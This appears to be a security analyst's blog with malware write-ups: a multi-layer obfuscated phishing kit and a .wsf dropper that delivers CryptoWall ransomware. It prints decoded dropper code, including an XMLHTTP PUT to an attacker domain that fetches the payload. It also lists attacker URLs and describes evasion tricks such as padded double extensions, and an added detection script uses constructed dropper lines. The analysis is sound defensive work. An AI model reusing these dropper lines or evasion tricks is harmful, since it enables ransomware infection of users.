Phishing kits are boring most of the time, and you can't fight stupid (users).
I recently came across an interesting kit. Thumbs up for the threat actor; if he had only worked a bit more on the e-mail he sends to victims (can't share it), it could have been much deadlier.
So how does this work?
1) The threat actor sends a bunch of emails to a big victim list; the message is something like "blabla please sign in to DocuSign to view the document in Google Docs" etc...
Sometimes the emails are in HTML format, so they change the <a href> tag so that the link looks legit when you hover over it, but clicking it sends you to a different URL.
In this case the attacker chose to use URL shortening:
hXXp://www.bit.ly/1Q5RMSN
This url is pointing to:
hXXp://jqueryapi.info/?getsrc=ok&ref=&url=data%3Atext%2Fhtml%3Bbase64%2CPFNjcmlwdCBMYW5ndWFnZT0nSmF2YXNjcmlwdCc%2BDQoNCmRvY3 ....
full url: http://pastebin.com/rPZ7Dzrt
jQuery you say? The data is a base64 blob; if we copy the blob (starting with "PFN") into some decoder we get some nice clear text like:
<Script Language='Javascript'>
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67
full: http://pastebin.com/dbv30qp2
Bang, a 2nd layer of obfuscation: JS with unescape obfuscation.
After decoding that we get another clear text, with yet another script!
<script language="javascript" type="text/javascript">var l1l='=oQKpkyJ8dCK0lGbwNnLnkXYsB3cpRmMywHf
full: http://pastebin.com/Vu2mAzV6
Damn son, a 3rd layer of obfuscation, with more JS code containing eval and some custom encryption. Even if we beautify the code it still looks nasty.
I don't really feel like stepping through all the code with a debugger to see exactly what happens, and probably neither do you, so let's create an HTML file with the JS code and change the "eval(_1OI(_1I1(l1l)));" call at the end to "window.alert(_1OI(_1I1(l1l)));"
This simply shows us the evaluated code in an alert box, and if we open the file in a browser we get this result:
"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+"
w00t? Another eval with custom encryption? 4 obfuscation layers for phishing? Dude, you are crazy!
OK, let's do the window.alert-instead-of-eval trick again?
Unfortunately the new code is too long for the alert box, so it is cut off before the end, and trying that trick results in an empty page.
So let's go back and change the "eval/window.alert" to "document.write".
We know it is safe to do so because in the first trick we saw that the output is an eval, and not a <script>.
full: http://pastebin.com/L3PrgjWK
OK, now I got stuck for a while, because I tried to apply the previous methods and they didn't work, while changing the eval to document.write would just show the phishing page.
After some googling I found http://handlers.sans.org/dwesemann/decode/
Using #2 - The Tom Liston Method, I got as a result another eval that looked very familiar to the one I already had. I thought maybe I did something wrong, so I pasted the output into my HTML page to show me the code after the "eval".
Once again the result contained an "eval", but this time I noticed a slight change in the code, so I kept replacing my HTML with the output of showme().
After 3 or 4 rounds of this I got new code in the text area:
"var _escape='%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%20%20%3Chead%3E%0A "
Another obfuscation!!!
full: http://pastebin.com/nHXBj5bB
OK, this finally looks like the end of the saga. At the end there is a check whether the user agent is Rambler or Yandex (Russian sites; guess the attacker is Russian and doesn't want to phish his own people), another check for "Yaho" (guess this is a typo), and finally it unescapes "var _escape" and writes the plain HTML to the page.
So here is the final result: http://pastebin.com/xDLTHPTN
This one was actually picked up by my ISP's content filtering, so this 7-layer fileless obfuscation actually works quite well at bypassing many filters.
TL;DR
block hXXp://www.ndsnotebook.com.br/wp-includes/css/themes/
Thursday, December 17, 2015
Wednesday, December 16, 2015
.wsf malware?
So I've stumbled upon something "new": a .wsf file, which is basically a fancy .vbs file.
URL to sample (as sent in the mail from threat actor, the usual invoice bull crap)
hXXps://www.mediafire.com/download/q1yqupocyigke3k/INVOICE_8329380DF.doc_.wsf
mirror: https://malwr.com/analysis/YWY2NjY3ZDhlYzUwNGI4ZGE4OTZhNzE4NjFiNDcwYTY/
| MD5 | 70ca3b4d70f564348e2d3ba903e78b5e |
|---|---|
| SHA1 | e5023bd075a47b6de994d4ea7c757fa7ce7fcbb4 |
| SHA256 | 9c007e99407b961ad34baa86b017867f75628f28b642e37ea1635ee5b1aa83e6 |
Now if we open that file we will see, in the first line and the few hundred that follow, gibberish text like this:
"/*Gelder Sunbelt Discontent Hookey Chared Precipiced
Infarct Hydrostatics ..."
This is basically one big comment that is meant to evade AV/analysts/ninjas...
After a few more lines you will find the end of the comment, the start of the .wsf file (job), and a new comment...
"Torquing*/
<job>
/*Teleph"
More blablabla, and then we find the most interesting part:
"Eviscerates Franking Anesthesiology Shamefaced
Streetlight Floorings*/
#@~^Wl8AAA==&JytksAmAhmU$kL?kxL!(ybn1.m$4[:wXVmp:Ph\X}hUd} s-3Hs\-"
The string "#@~^" indicates that this is an encrypted VBScript (.vbe). I had encountered these before, but I had never found a good working method to decode them, up until now.
A user named "Hackoo" on Stack Overflow posted this nice code that does the job perfectly:
http://stackoverflow.com/questions/32882622/convert-vbs-encrypted-script-to-string
After we decode the .vbe we get some more gibberish, like this:
"if (!nAkTeFqOrAeRcwmTaBmAhangdYaVmLhHuExSkLgEedqGrGwSuCnHatiScgug.fileexists(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG+'\\qAcTyGsrkHlBagwS.doc')) { //lPwCyOgfdAoXiflWaqeluLlDcGagxtrKaBbttMsIciwQgslGgXctbAlWmPmcmGfyyXsSbAnGavtDnEqTrEhyxMgZbBlEoQmLpBeShWuRhYkSbxxIuqpTrkmquSfAiRyDgibAhgrGgnmBwyxGuHkAaTbskrgOfUmFwMtmyGvIeHeQdVlytgqOrFuAfOpgrMiQoEqPaWqTaGcaeLgFdGkLkWxYngvKlanwyKbKtkktyUtxeAkYgYyEwimTomlagTcCpUeRmpqlkcaWgChAqVgGuRdZsHhBoBhFyAbObDnGyGxGcUcB //agnXrHaNpCfKwOahkLiZnPmAufcPuAhbfbwnqPlLoOfpqGgDpRigbUpGdwmamBvazCgrzNgGhSwAagxKqvcucfxUdIoFsSvMdHdRmhiPpOkPcPrZsOtBqAqPpWhueVgUhMiWwOpLvUgWfEaKyigKwCpGePwZsMcZtupGvCzHuphGaElAnQemtgvZdMfurRaMwLhohRydbEkurKrGrVaUqdbVgtaKcFaymexPkRnclroHgLzQvBfFqwdAfGwLgZrDbAswtDlgrHegaZwkhUawdMmZrLhUhldoyQmRgAtEyRhSoVvFhqbWqMkcvEexzEsIcEhBeGtOflkFmdsdaPzYlbhTfWhkfRgQ //gWytuPsKlhaZqAiwvLrCwYnAmFuOpGnihKdDlgcCrXtNuXzFdBbiaDtQgVfVvSgtqVrNdruFgOwQdWngpAaAqaeGgZvftLyzlGhDoYbdoZescppVoD //hPpAwBiZmHbEynvxighIdqgObGvOhXcXaDpUgdyWxokZrFxBoXpFkWxupOzGrCpVgzoCgZkidCqVoGxFoGrUqFaqfTuFcOgAoFafkzyBlofKtBxogCgIyOsGrWtBiOfnpYlOcQwEyRvlyMsvbYnGdQqDhrxVfCvOzQ //aEsHkVkRxDnVgRiqpWpBxevQtAcXaGyzmGaOiAytybmklWlGgExmyHwDkAqvdPlYyunTdBfWzruVhkxGalrVxOlMtbthvRkFmQfPmXaVkApHpQgMpygybUfYdgbOgWmAivnXuefBaTslahgYgGgHyZimuasTmasGkPlBgRqLuAnToZfGgtaSsSnakeovlOaxwqdsaPgSpRdtsIaSwyxGltfRbezSrfdCfgqDaZnYbakyaAgEbCbItruGgMdBdYsGxQfYsTncgPdCudaUoatVbFuQiYmAtAcYrNaNcblRdGwBlaoTqRiVgIcIvXfWoDfHoQvBoXdOpXiWcAuSrPqewNeUbEgDgntKfdoceyobqDaSpSuEaDpDwKylvEqCpWvcdTnYncyevCpGaHiTfBsYkGyBrfpIbDtIhFaBbYmYeCwGhGcHssgYipvKsMvTaXttgynQosgCgU var bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV=WScript.CreateObject('MSXML2.XMLHTTP'); bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV.open('PUT','http://aolmessenger.su/update/check.php',false); bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV.send();"
Again, the threat actor uses // comments so the untrained eye fails to find "http://aolmessenger.su/update/check.php"
So after removing the comments from the decrypted .vbe we end up with a simple .vbs file that connects to:
http://aolmessenger.su/update/check.php
and
http://aolmessenger.su/update/info.doc
You think the threat actor is done trying to fool us? Think again, here comes the most interesting stuff:
In sandbox analysis the .wsf file drops a .com (PE) file and a .doc file.
You can see that in the decoded .vbe strings:
"zHqnrMwaqnaHscsuvNsZyGkSetgTsMsywT.Exec(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG + '\\uarQrKkeoPnqnOgAgHfZ.com');
gUntydcFbSphhglgyWeNgDkZgYuNlBoDxm.SaveToFile(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG + '\\qAcTyGsrkHlBagwS.doc');"
The .doc file is clean and is a decoy for the .wsf file; the file that is saved is actually named "INVOICE_8329380DF.doc .wsf"
So even if you have extensions visible, all the blank spaces push the extension out so you barely see it, and the user thinks he opened a .doc file, so he expects a .doc file to open, which is exactly what happens with this dummy file.
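Two checks for the tricks just described, as an added example that is not the post's own code: a comment stripper that walks string literals so the "//" inside 'http://...' survives while the // junk comments go (the point made about check.php above), and an attachment-name check for the "decoy.doc<spaces>.wsf" pattern. The dropper text and domains in the sample are constructed, not the real sample's strings.

```javascript
// Added example: surface the real indicators in a decoded .vbe/JScript dropper
// and flag whitespace-padded double extensions. Sample data is constructed.
function stripJsComments(src) {
  let out = '', i = 0;
  while (i < src.length) {
    const c = src[i], n = src[i + 1];
    if (c === '"' || c === "'") {            // copy a string literal verbatim
      let j = i + 1;
      while (j < src.length && src[j] !== c) { if (src[j] === '\\') j++; j++; }
      out += src.slice(i, j + 1); i = j + 1;
    } else if (c === '/' && n === '*') {     // block comment: drop through */
      const end = src.indexOf('*/', i + 2);
      i = end < 0 ? src.length : end + 2;
    } else if (c === '/' && n === '/') {     // line comment: drop to end of line
      const end = src.indexOf('\n', i);
      i = end < 0 ? src.length : end;
    } else { out += c; i++; }               // (regex literals are not handled)
  }
  return out;
}
// URLs and CreateObject() targets that survive comment removal, deduplicated.
function extractIndicators(src) {
  const clean = stripJsComments(src);
  const urls = [...clean.matchAll(/https?:\/\/[^'"\s]+/g)].map(m => m[0]);
  const objs = [...clean.matchAll(/CreateObject\(\s*['"]([^'"]+)['"]/g)].map(m => m[1]);
  return { urls: [...new Set(urls)], objects: [...new Set(objs)] };
}
// "INVOICE.doc<whitespace>.wsf": a decoy extension, padding, then a script extension.
const SCRIPT_EXT = ['wsf', 'vbs', 'vbe', 'js', 'jse', 'hta'];
function hasPaddedScriptExtension(name) {
  const m = /\.(\w{2,4})[ \t\u00a0]+\.(\w{2,4})$/i.exec(name);
  return !!m && SCRIPT_EXT.includes(m[2].toLowerCase());
}
// Constructed dropper fragment in the style of the decoded .vbe above.
const SAMPLE_JS = [
  "/*Eviscerates Franking*/",
  "var x = WScript.CreateObject('MSXML2.XMLHTTP'); //kAaTbskrgOfUmFwMtmyGvIeHeQ",
  "//hPpAwBiZmHbEynvxighIdqgObGvOhXcXaDpUgdyWxokZ",
  "x.open('PUT','http://dropper.invalid/update/check.php',false); x.send();",
  "/*Torquing*/ var s = WScript.CreateObject('ADODB.Stream'); // s.open('GET','http://decoy.invalid/x')",
  "s.SaveToFile(d + '\\\\qAcTyGsrkHlBagwS.doc');",
].join('\n');
```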
doc md5:
03dc2be6251417386887ed968482deb2
Now, the PUT request to check.php in the .vbe caused the .com file to be downloaded.
But if you try to go to that URL yourself you will get this little fella:
x-mas.jpg - md5: b2d625408dfc0347e8202c9ccd36adbb
This nice x-mas greeting is in Russian (Хуй? пизда? джигурда!)
The first two words are common curse words; the 3rd one stumped me, and I found the explanation for this phrase here: https://www.youtube.com/watch?v=foodjSqrAh0
If you don't know Russian, turn on the English captions, they are hilarious!
So it looks like yet another method of keeping ninjas out, but I have the .com file from the sandbox analysis; maybe if I tried getting it with PUT like the .vbs does, or by changing the user agent, I would get it as well.
So what is this final payload? Oh, this is just CryptoWall (4?)
md5: 908185de411e7e513535599540932caa
How do I know it is CryptoWall? If your sandbox is good, the malware will encrypt files, delete the shadow volume copies, and create HELP_DECRYPT files that say welcome to the CryptoWall family.
Every time I ran it I got a different C&C; here are some:
From a quick search it looks like the C&C servers are compromised servers.
The domain for the dropped files (aolmessenger.su) looks fairly new, and if you weren't sure the threat is Russian, here is another nail in the coffin:
Looks like the actor wanted to verify his new domain is reachable
and some registrant info:
Thursday, December 3, 2015
Intro
Hi all, and welcome to my blog.
This is an introduction post to my blog, which will have posts about the adventures of a junior security analyst. The opinions and thoughts expressed here are my own and all that bla bla...
In our area of cyber security, where the threats always change, I have found that personal blog posts are the best source of information. I have learned a lot myself from such posts, and I will constantly add blogs to my reading list, as soon as I figure out how it works.
I had thought about opening my own blog for a while now, to share back, but I didn't have anything interesting to write about, up until recently.
So this blog should have posts written in an easy and detailed way, so other people can use the info to learn new things as I did.
So stay tuned for the soon-to-be first detailed post about a threat I have found.